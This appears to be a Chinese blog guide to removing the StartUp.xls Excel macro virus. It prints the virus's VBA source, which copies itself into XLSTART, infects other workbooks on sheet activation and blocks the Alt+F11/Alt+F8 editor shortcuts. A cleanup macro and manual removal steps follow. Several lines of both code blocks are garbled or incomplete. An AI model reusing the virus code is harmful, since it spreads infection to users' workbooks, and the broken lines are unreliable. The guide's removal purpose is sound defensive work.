清除宏病毒,名字是:StartUp.xls方法
--大白菜
文中图片都很小,看不清楚,可以用以下快捷方式:按住ctrl 向上滚动鼠标滑轮可以放大word,就可以看清楚图片了
病毒样本如下:(下面是宏病毒代码,电脑知识欠缺的,千万被乱动哦,小心弄巧成拙)
Vba代码
=================宏病毒代码复制从下一行开始=================
Sub auto_open()
On Error Resume Next
If ThisWorkbook.Path <> Application.StartupPath And
Dir(Application.StartupPath & "\" & "StartUp.xls") = "" Then
Application.ScreenUpdating = False
ThisWorkbook.Sheets("StartUp").Copy
ActiveWorkbook.SaveAs (Application.StartupPath & "\" & "StartUp.xls")
n$ =
ActiveWindow.Visible = False
Workbooks("StartUp.xls").Save
Workbooks(n$).Close (False)
End If
Application.OnSheetActivate = "StartUp.xls!cop"
Application.OnKey "%{F11}", "StartUp.xls!escape"
Application.OnKey "%{F8}", "StartUp.xls!escape"
End Sub
Sub cop()
On Error Resume Next
If ActiveWorkbook.Sheets(1).Name <> "StartUp" Then
Application.ScreenUpdating = False
n$ =
Workbooks("StartUp.xls").Sheets("StartUp").Copy
before:=Worksheets(1)
Sheets(n$).Select
End If
End Sub
Sub back()
On Error Resume Next
Application.OnKey "%{F8}", "StartUp.xls!escape"
Application.OnKey "%{F11}", "StartUp.xls!escape"
Application.OnSheetActivate = "StartUp.xls!cop"
Application.OnTime Now + TimeValue("00:00:01"), "StartUp.xls!cop" Workbooks.Open Application.StartupPath & "\StartUp.xls"
End Sub
Sub escape()
On Error Resume Next
Application.OnSheetActivate = "StartUp.xls!back"
Application.OnKey "%{F11}"
Application.OnKey "%{F8}"
Application.SendKeys "%{F11}"
Application.SendKeys "%{F8}"
For Each book In Workbooks
Application.DisplayAlerts = False
If book "StartUp.xls" Then book.Sheets("StartUp").Delete
Next
For Each book In Workbooks
If = "StartUp.xls" Then
book.Close
End If
Next
End Sub
=================宏病毒代码复制到上一行结束=================
为了知道如何操作,亲自运行病毒源码之后,
(按住ctrl 向上滚动鼠标滑轮可以放大word ,就可以看清楚图片了)
采取以下的方法处理,可以清除病毒并使感染文件在修改保存后也清除病毒(网上有人说用360或卡巴直接杀会导致文件打不开):
说明:如果找不到那个路径,是因为C盘是系统盘,那些是系统文件,被隐藏了,可以参照:
/xiaolincc26/blog/item/2c524d4be7757c2d08f7ef35.h tml去做
步骤:
一、删除Excel11.xls
文件位置路径:
C:\Documents and Settings\Administrator\Application
Data\Microsoft\Excel\Excel11.xls
,该文件删除后,Excel会自动重建的;
二、删除StartUp.xls
文件位置路径:
C:\Documents and Settings\Administrator\Application
Data\Microsoft\Excel\XLSTART\StartUp.xls
二、新建一个空的StartUp.xls,工具-》宏-》录制宏(随便录,只是为了能打
开VBA编辑器);
下面这个就叫VBA编辑器(普通人没有要知道,百度一下就有
/view/88461.htm):这张图不是步骤中的内容,只是了解下.
第二步:
1.新建一个Excel:
2.重命名为StartUp.xls
三、从“工具->宏->宏”里面,选择刚才录制的宏,选择“编辑”,把全部内
容都选中,把用下列内容替换:
第三步:1.打开刚刚新建的那个Excel: StartUp.xls
2.打开录制宏,工具-》宏—>录制宏,
点击上图的确定,
3.打开宏,工具—》宏--》宏,
4.点击编辑按钮,
5.复制Vba代码(看清楚开始和结束位置)内容到编辑区,覆盖原有的内容,
Vba代码
============复制从下一行开始(Sub auto open()开始)=============
Sub auto_open()
On Error Resume Next
Application.ScreenUpdating = False
ActiveWindow.Visible = False
n$ =
Workbooks(n$).Close (False)
Application.OnSheetActivate = "StartUp.xls!cop"
End Sub
Sub cop()
On Error Resume Next
Dim VBC As Object
Dim Name As String
'Dim delComponent As VBComponent
Name = "StartUp"
For Each book In Workbooks
Set delComponent = book.VBAProject.VBComponents(Name)
book.VBAProject.VBComponents.Remove delComponent
Next
End Sub
============复制到上一行结束(End Sub结束)=============
6.关闭时候,保存StartUp.xls
四、保存,然后再打开染毒文档,修改保存一下就可以清除掉感染的病毒。
五、最后设置宏的安全性,安全级别设置为中级以上。